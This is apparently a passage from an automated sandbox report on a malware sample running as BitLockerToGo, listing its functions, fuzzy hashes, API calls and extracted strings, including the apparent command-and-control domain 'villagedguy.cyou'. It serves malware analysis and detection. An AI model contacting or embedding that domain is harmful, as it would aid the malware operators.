                                                                                                                                                                          • Instruction Fuzzy Hash: 4B112B75604300EBD7185B14A8A1B3F7362FB59716F54772EE85213253C379C802CB8E
                                                                                                                                                                          Function 0042EF36 Relevance: 1.3, Strings: 1, Instructions: 53COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: MNOP
                                                                                                                                                                          • API String ID: 0-783613192
                                                                                                                                                                          • Opcode ID: 1a43a43b2f3dc0f6071f364d717c6c612f66006a932fc4894e642f3eb89a6f32
                                                                                                                                                                          • Instruction ID: f52fc4fee7d4c401a98e41dc206cb85056432fe1198f9fa9d842320524490bb3
                                                                                                                                                                          • Opcode Fuzzy Hash: 1a43a43b2f3dc0f6071f364d717c6c612f66006a932fc4894e642f3eb89a6f32
                                                                                                                                                                          • Instruction Fuzzy Hash: 1F014730704350EBD7288F11AA5173F7392BBC671AF55492DE48127B82C378C801878A
                                                                                                                                                                          Function 0040F39C Relevance: 1.3, Strings: 1, Instructions: 39COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: villagedguy.cyou
                                                                                                                                                                          • API String ID: 0-472080494
                                                                                                                                                                          • Opcode ID: ad180c49b8e67a77647949eb261cd3a3771dc2d290259a89548967df233e1282
                                                                                                                                                                          • Instruction ID: e2342cbf2de96edc5457a879679271ee1ad9e8d7e4fc9f35044ddc2c6406840f
                                                                                                                                                                          • Opcode Fuzzy Hash: ad180c49b8e67a77647949eb261cd3a3771dc2d290259a89548967df233e1282
                                                                                                                                                                          • Instruction Fuzzy Hash: 25E04FA595511086C3684F04C9A1173B270FF23355718383BECC6AB7A1F2789804C39D
                                                                                                                                                                          Function 00409602 Relevance: .4, Instructions: 442COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 525e470eb9cfcfce4e6792d1b173326834ffe4469737fbfc6aa4b07063161c37
                                                                                                                                                                          • Instruction ID: 27c6a332ff83b37ab2b545a79f61b65a4de86583289330a373b1913817e4a747
                                                                                                                                                                          • Opcode Fuzzy Hash: 525e470eb9cfcfce4e6792d1b173326834ffe4469737fbfc6aa4b07063161c37
                                                                                                                                                                          • Instruction Fuzzy Hash: A0F1CD3A609201CFD748CF28D8A076A77E2BBC9324F19893DE85A97391D734ED45CB85
                                                                                                                                                                          Function 0040A8F0 Relevance: .4, Instructions: 424COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 4b52666819d2965ad0bc47dc74526e1040d1e10e9667a4627c7b2d62442516e1
                                                                                                                                                                          • Instruction ID: cf766477efaa56cb24f6b912050b9a56b51fd79d3fc9e9d4a353c9d3bf7f653f
                                                                                                                                                                          • Opcode Fuzzy Hash: 4b52666819d2965ad0bc47dc74526e1040d1e10e9667a4627c7b2d62442516e1
                                                                                                                                                                          • Instruction Fuzzy Hash: EFF1CC712087418FC724CF29C980A2BFBE2EF95304F04892EE5D957791E275E958CB9B
                                                                                                                                                                          Function 00441770 Relevance: .2, Instructions: 215COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                          • Opcode ID: 89b5b4b29dc0531f6a8ac2e7f08f644eb048f770bd66c2e9d1babd8299ed27e9
                                                                                                                                                                          • Instruction ID: b3f1b0fec4a6767989cf80c65b08afcc8272fd86bc25c9765320da8a13a74187
                                                                                                                                                                          • Opcode Fuzzy Hash: 89b5b4b29dc0531f6a8ac2e7f08f644eb048f770bd66c2e9d1babd8299ed27e9
                                                                                                                                                                          • Instruction Fuzzy Hash: 59513872B083008FE7189E28DC9176BB7D2EBD5354F19C92EE49587361D738D841C786
                                                                                                                                                                          Function 00405DF0 Relevance: .2, Instructions: 163COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 231db6bcaeac71daac8feb54fb16dcd8dc8b43626ccb9b10ac63ee1ab065d202
                                                                                                                                                                          • Instruction ID: 8f246e5cd2c8da90c715cd24b1d559549da8667182c15212baa1ccd6d6bf01fe
                                                                                                                                                                          • Opcode Fuzzy Hash: 231db6bcaeac71daac8feb54fb16dcd8dc8b43626ccb9b10ac63ee1ab065d202
                                                                                                                                                                          • Instruction Fuzzy Hash: 9851C1749046019FC714DF14C880927B7A1FF89368F15467EF899AB392DA39EC42CF9A
                                                                                                                                                                          Function 00404D40 Relevance: .1, Instructions: 95COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: edd2b7b0831ca3fec54a0d4e73314f1c751f972e77800cc2f30b40c87ed08e5c
                                                                                                                                                                          • Instruction ID: 92c31edd3a2aaa43d98f7409f3dc6e90c9de5b7e8cd5bcdb0fef97f6dedefdd9
                                                                                                                                                                          • Opcode Fuzzy Hash: edd2b7b0831ca3fec54a0d4e73314f1c751f972e77800cc2f30b40c87ed08e5c
                                                                                                                                                                          • Instruction Fuzzy Hash: 5331CAB16142019BD7159E59C88092BB7E1EFC8318F18893EE999EB3C1D739DC52CB4A
                                                                                                                                                                          Function 0043AC20 Relevance: .1, Instructions: 64COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                                                          • Instruction ID: a0e5f51a23aeda5538425fd11c967d5151d1bbe88b007a96606e2b184ab1ea98
                                                                                                                                                                          • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                                                          • Instruction Fuzzy Hash: B211E933A451D40FC3168D3C8440575BFA30AE7634F1DA39AF4F49B2D2D62B8D8A835A
                                                                                                                                                                          Function 00430E70 Relevance: .1, Instructions: 63COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 54cf0d7eb44159eb5cad9756730d732e7342f18c2b21a364de4663e69d8e7b3e
                                                                                                                                                                          • Instruction ID: d1ff25ca70ce556d1194ab235fd7d7d4837c7f84478faa715aa100623d9e17a7
                                                                                                                                                                          • Opcode Fuzzy Hash: 54cf0d7eb44159eb5cad9756730d732e7342f18c2b21a364de4663e69d8e7b3e
                                                                                                                                                                          • Instruction Fuzzy Hash: BB0188F1B0030157D720AE6594D2B37B2A99F98708F185A3ED50867342DB7DEC09C799
                                                                                                                                                                          Function 0043FCD0 Relevance: .0, Instructions: 21COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: a4b5204e339133bf84330416a5308528dd9e98d6cb7a6fcb91640552a86da4e7
                                                                                                                                                                          • Instruction ID: 406349337e2720d1c882b623ac75ef62643c72c13a7f183dc60ea46d8093d2ec
                                                                                                                                                                          • Opcode Fuzzy Hash: a4b5204e339133bf84330416a5308528dd9e98d6cb7a6fcb91640552a86da4e7
                                                                                                                                                                          • Instruction Fuzzy Hash: A9D05B21948321465B648D199400977F7E0FA87711F45656FF982D3254D234DC41C2AD
                                                                                                                                                                          Function 0040F345 Relevance: .0, Instructions: 19COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 5cce6e5a9b1187edf9050197e767982aba5c70abdbb5d6a67204e9a97dfe04b0
                                                                                                                                                                          • Instruction ID: a0fc4d066b209943d87907f808e35cd7e4db14fd5a36bf8cde9c7d9203e5739d
                                                                                                                                                                          • Opcode Fuzzy Hash: 5cce6e5a9b1187edf9050197e767982aba5c70abdbb5d6a67204e9a97dfe04b0
                                                                                                                                                                          • Instruction Fuzzy Hash: 39D06271A1441A8FCB18CF6DCD409BEF7B5BE96301B09A6659025DB295EB30E5148644
                                                                                                                                                                          Function 0042A593 Relevance: .0, Instructions: 11COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: e3973ddca8f26cb903ea449fb56e2107df1dfe7e314b31ecb2f87ded3017a1f1
                                                                                                                                                                          • Instruction ID: e75702912f7a73cba57e5976f8cd436e279ef2adfeaed57356928004743b3b97
                                                                                                                                                                          • Opcode Fuzzy Hash: e3973ddca8f26cb903ea449fb56e2107df1dfe7e314b31ecb2f87ded3017a1f1
                                                                                                                                                                          • Instruction Fuzzy Hash: 38B092E9C0281086D0513BA23C02AAAB064195320CF042036E90A32243A72ED21F409F
                                                                                                                                                                          Function 00410BB6 Relevance: .0, Instructions: 11COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 81670a65e88d0cdfa560c12bda757ecbe3d249f1b492077bc305510e417da0f5
                                                                                                                                                                          • Instruction ID: 1e3016d1d5d503d74b52ba7f01ceef03ff8bcb4f2c6887d4410395c1ee560280
                                                                                                                                                                          • Opcode Fuzzy Hash: 81670a65e88d0cdfa560c12bda757ecbe3d249f1b492077bc305510e417da0f5
                                                                                                                                                                          • Instruction Fuzzy Hash: 8AC09B15D5C0804ED345CF1058751F05F24552714CF1C306E8556D7553D605C113C70D
                                                                                                                                                                          Function 00436559 Relevance: 49.2, APIs: 1, Strings: 27, Instructions: 194memoryCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AllocString
                                                                                                                                                                          • String ID: !$#$%$&$'$)$)$.$0$5$;$E$F$G$I$K$W$^$e$f$h$j$l$m$t$y$}
                                                                                                                                                                          • API String ID: 2525500382-909441541
                                                                                                                                                                          • Opcode ID: 2a6b192ac4ed0cce775719bfa892da8a2fe5591301031f9826e3751c2d43d799
                                                                                                                                                                          • Instruction ID: 201381b965fb42d57d0257f9e5a00960b098af9a9f309e5a6a790de23955b1ce
                                                                                                                                                                          • Opcode Fuzzy Hash: 2a6b192ac4ed0cce775719bfa892da8a2fe5591301031f9826e3751c2d43d799
                                                                                                                                                                          • Instruction Fuzzy Hash: 04B1063150CBC28AD336863C98487DFAED11BE7328F188BADD1E94B2D2D6B90145C767
                                                                                                                                                                          Function 00435E39 Relevance: 33.3, APIs: 2, Strings: 17, Instructions: 76COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Variant$ClearInit
                                                                                                                                                                          • String ID: ,$>$_$a$c$e$g$i$k$m$o$q$s$u$w$z${
                                                                                                                                                                          • API String ID: 2610073882-3928692984
                                                                                                                                                                          • Opcode ID: a59f28c90c0ad03e0f47b94ee8f84a09c099c02eb2988e8cff5067ff22b26a01
                                                                                                                                                                          • Instruction ID: bd81ba4ceb9fbe0b5e70cdf877511d58f3267c5b0d7115c4485707a14669d6c2
                                                                                                                                                                          • Opcode Fuzzy Hash: a59f28c90c0ad03e0f47b94ee8f84a09c099c02eb2988e8cff5067ff22b26a01
                                                                                                                                                                          • Instruction Fuzzy Hash: 6D41F82050D7C1CDE332C73C9858B9BBED26BA6218F084AADD0D9876D6D7B901498727
                                                                                                                                                                          Function 0043574C Relevance: 19.3, APIs: 2, Strings: 9, Instructions: 89COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Variant$ClearInit
                                                                                                                                                                          • String ID: $#$+$+$1$5$:$R$y
                                                                                                                                                                          • API String ID: 2610073882-2489440055
                                                                                                                                                                          • Opcode ID: 59e3bf10b89bfffaac53e980a493e0541ca72c27bde5546fbf384eb6f4fcbf14
                                                                                                                                                                          • Instruction ID: 7adea1189b9d2899e86cfbfd75371cacccc94584c9b73bede33c9e77b3e204de
                                                                                                                                                                          • Opcode Fuzzy Hash: 59e3bf10b89bfffaac53e980a493e0541ca72c27bde5546fbf384eb6f4fcbf14
                                                                                                                                                                          • Instruction Fuzzy Hash: 4E412A6150CBC18ED335AB38844839FBFD16BA6314F188A9DE5E5873E2CB74800ADB57
                                                                                                                                                                          Function 00435C86 Relevance: 19.3, APIs: 2, Strings: 9, Instructions: 87COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Variant$ClearInit
                                                                                                                                                                          • String ID: $#$+$+$1$5$:$R$y
                                                                                                                                                                          • API String ID: 2610073882-2489440055
                                                                                                                                                                          • Opcode ID: f0a429a189294ed03afcd11ccc086267a9569da1e652b7a0cc2ff71237374a81
                                                                                                                                                                          • Instruction ID: 265269d8252d7e8f7c9ca00c1f24ad95b5395bdf85d5f6e6ceb7d4d2e0c635a8
                                                                                                                                                                          • Opcode Fuzzy Hash: f0a429a189294ed03afcd11ccc086267a9569da1e652b7a0cc2ff71237374a81
                                                                                                                                                                          • Instruction Fuzzy Hash: 2741FA6150CBC18ED3329B38844839FBFD16BA6314F188E9DE5E58B2E2C775810ADB57
                                                                                                                                                                          Function 0042A5BC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 174COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: DrivesLogical
                                                                                                                                                                          • String ID: Gt$L_
                                                                                                                                                                          • API String ID: 999431828-1375530031
                                                                                                                                                                          • Opcode ID: 1a6be90d356bee28258b8c4b1b5cbc905d3916c5a1710fa8385e560bdaae87ba
                                                                                                                                                                          • Instruction ID: 71d07980d51fba32441b4c7d850694f1eaa7d290076b2809f47af00d58fe155e
                                                                                                                                                                          • Opcode Fuzzy Hash: 1a6be90d356bee28258b8c4b1b5cbc905d3916c5a1710fa8385e560bdaae87ba
                                                                                                                                                                          • Instruction Fuzzy Hash: EE5151B46193819FD310DF65A99061BBBF0EF96344F848A2DE9D58B350D3788905CB8B
                                                                                                                                                                          Function 004209AA Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 113COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • FindWindowExW.USER32(00000000,?,Y~,00000000), ref: 00420A82
                                                                                                                                                                          • FindWindowExW.USER32(00000000,00000000,Y~,00000000), ref: 00420B62
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FindWindow
                                                                                                                                                                          • String ID: Y~
                                                                                                                                                                          • API String ID: 134000473-649834763
                                                                                                                                                                          • Opcode ID: d624f99e04a35acac8017a6fe6ab58c5cb885d9f92a1c585014e816abfd08046
                                                                                                                                                                          • Instruction ID: 409c0a10e8c2f64c9234f1f3cee7d592946007bc94705be4b9665bc431326c51
                                                                                                                                                                          • Opcode Fuzzy Hash: d624f99e04a35acac8017a6fe6ab58c5cb885d9f92a1c585014e816abfd08046
                                                                                                                                                                          • Instruction Fuzzy Hash: E731927555C3908AD378CF51D4867CBFBA0EFAA314F048A2CD9D85B242D7B919058FC6